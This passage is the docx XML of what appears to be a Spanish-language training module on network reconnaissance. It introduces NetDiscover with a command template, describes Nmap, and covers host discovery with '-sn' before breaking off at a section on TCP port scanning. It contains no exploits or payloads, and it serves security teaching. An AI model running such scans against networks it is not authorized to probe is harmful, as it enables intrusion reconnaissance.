      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> la red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEF88E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C251D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="86"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C98237" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="2231"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>NetDiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> es </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>una</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>herramienta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>muy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>útil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>encontrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> redes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>inalámbricas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>conmutadas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12952FCE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0057B1AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando : netdiscover -i &lt;interface&gt; -r &lt;dirección IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>formato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> CIDR&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F480A65" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="165"/>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7667200" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FD4E8A6" wp14:editId="45EDF40F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2513042</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>275044</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7370445" cy="2608580"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0445" cy="2608580"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7370445" cy="2608580"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="411" name="Image 411"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId188" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="7370131" cy="2608092"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="412" name="Image 412"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId189" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164625" y="164792"/>
                            <a:ext cx="7054596" cy="2292096"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="31A15777" id="Group 410" o:spid="_x0000_s1026" style="position:absolute;margin-left:197.9pt;margin-top:21.65pt;width:580.35pt;height:205.4pt;z-index:-15649280;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="73704,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">
                <v:shape id="Image 411" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:73701;height:2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">
                  <v:imagedata r:id="rId190" o:title=""/>
                </v:shape>
                <v:shape id="Image 412" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1647;width:70546;height:2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">
                  <v:imagedata r:id="rId191" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C3A8A6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="980" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7229B601" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:spacing w:before="8"/>
        <w:ind w:left="1779"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nmapa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45382C10" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="402"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FF4AA4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1513"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nmap ("Network Mapper") es una utilidad gratuita y de código abierto para el descubrimiento de redes y la auditoría de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF2D79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="395"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE06821" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1484"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nmap utiliza paquetes IP sin procesar de formas novedosas para determinar qué hosts están disponibles en la red, qué servicios (nombre y versión de la aplicación) ofrecen esos hosts, qué sistemas operativos (y versiones del sistema operativo) están ejecutando, qué tipo de filtros de paquetes/firewalls están en uso y docenas de otras características.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4207866A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="398"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BC74D6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1463"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nmap se ejecuta en todos los principales sistemas operativos de computadoras, y los paquetes binarios oficiales están disponibles para Linux, Windows y Mac OS X.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB17E7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0530AA73" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:spacing w:line="726" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Descubrimiento de hosts: uso de Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707B3BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="369"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D86B805" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1822"/>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="10296"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nmap tiene una gran cantidad de switches que discutiremos más adelante en este módulo, pero para esto discutiremos los switches relevantes para el descubrimiento de hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E5C4C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D37D08F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1822"/>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="9903"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">En este caso, usaremos el switch "-sn" que le dirá a nmap que haga solo el descubrimiento del host y no el escaneo de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>puertos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>después</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>él</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6148EF04" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46064A0A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:spacing w:line="686" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Técnicas de escaneo de puertos TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A533673" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="582"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655CCB4B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="165" w:lineRule="auto"/>
        <w:ind w:right="824"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Para realizar el escaneo de puertos TCP, hay muchos métodos de escaneo que podemos usar para encontrar el estado del puerto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFDD47" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="74"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1408CF40" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
